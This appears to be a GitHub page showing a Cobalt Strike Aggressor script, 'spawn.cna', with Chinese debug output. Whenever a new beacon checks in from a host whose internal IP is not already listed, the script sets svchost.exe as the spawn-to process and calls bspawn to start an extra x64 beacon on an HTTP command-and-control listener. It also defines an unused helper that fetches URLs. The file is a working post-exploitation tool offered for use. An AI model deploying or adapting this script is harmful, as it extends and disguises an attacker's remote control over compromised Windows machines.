-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathspawn.cna
42 lines (33 loc) · 885 Bytes
/
spawn.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
@a = @();
on beacon_initial {
sub http_get {
local('$output');
$url = [new java.net.URL: $1];
$stream = [$url openStream];
$handle = [SleepUtils getIOHandle: $stream, $null];
@content = readAll($handle);
foreach $line (@content) {
$output .= $line . "\r\n";
}
println($output);
}
println("1a列表:".@a);
@b = @();
$internalIP = replace(beacon_info($1, "internal"), " ", "_");
add(@b,$internalIP)
println("1b列表:".@b);
foreach $c (@b){
if ($c in @a){
println("存在")
}else{
println("开始spawn");
bspawnto($1, "x64", "%windir%\\sysnative\\svchost.exe");
bspawn($1, "http", "x64");
}
}
foreach $beacon (beacons()) {
#println("Bid: " . $beacon['internal'] . " is " . $beacon['pid']);
add(@a,$beacon['internal'])
println("2a列表:".@a);
}
}